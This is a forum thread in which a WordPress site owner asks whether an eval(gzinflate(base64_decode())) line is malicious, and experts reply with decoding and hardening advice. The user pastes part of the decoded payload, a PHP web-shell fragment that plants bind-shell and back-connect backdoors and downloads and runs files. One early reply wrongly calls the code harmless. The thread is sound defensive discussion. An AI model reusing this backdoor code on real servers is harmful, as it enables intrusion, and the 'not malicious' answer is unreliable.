?
Solved

Is this Malicious code?

Posted on 2011-03-23
10
Medium Priority
?
412 Views
Last Modified: 2012-05-11
Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my wordpress files...
0
Comment
Question by:checkmofoshoduno
  • 2
  • 2
  • 2
  • +3
10 Comments
 

Expert Comment

by:eaglerod
ID: 35204600
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204603
How can i check to see what the code actually is when its decoded?
0
 
LVL 15

Expert Comment

by:Phil Phillips
ID: 35204630
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' Wordpress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval
0
Free Tool: Path Explorer

An intuitive utility to help find the CSS path to UI elements on a webpage. These paths are used frequently in a variety of front-end development and QA automation tasks.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

 

Expert Comment

by:eaglerod
ID: 35204631
I believe this is what you are looking for.

Decoding Information
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35204633
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.
0
 
LVL 4

Expert Comment

by:m_walker
ID: 35204634
@eval(gzinflate(base64_decode($code)));

try
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Note sure where $code gets its value from.
The code could be binary, so expect some weird results.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204644
Yep i managed to also find that link for the decoder and unless that site is messing with me i am seeing the output say "Load and Exploit" and a bunch of other not so good things such as Port Binding

Looks like i will just remove that block of code for now...

Please see attached.
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.
"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Open in new window

0
 
LVL 27

Expert Comment

by:Lukasz Chmielewski
ID: 35204821
The additional question - how did it get there ? Change your access passwords to strong ones and do not store them locally on your computer.
0
 
LVL 15

Accepted Solution

by:
Phil Phillips earned 2000 total points
ID: 35204927
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make Wordpress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here's a few blog posts that discuss how to recover from a hacked Wordpress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35208486
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.
0

Featured Post

Free Tool: Path Explorer

An intuitive utility to help find the CSS path to UI elements on a webpage. These paths are used frequently in a variety of front-end development and QA automation tasks.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Originally, this post was published on Monitis Blog, you can check it here . In business circles, we sometimes hear that today is the “age of the customer.” And so it is. Thanks to the enormous advances over the past few years in consumer techno…
Laravel is the most sought after web development framework. It comes with ample amount of features that make it easy for developers to work around it. Know about its features in detail.
The viewer will learn how to look for a specific file type in a local or remote server directory using PHP.
The viewer will learn how to create a basic form using some HTML5 and PHP for later processing. Set up your basic HTML file. Open your form tag and set the method and action attributes.: (CODE) Set up your first few inputs one for the name and …

589 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question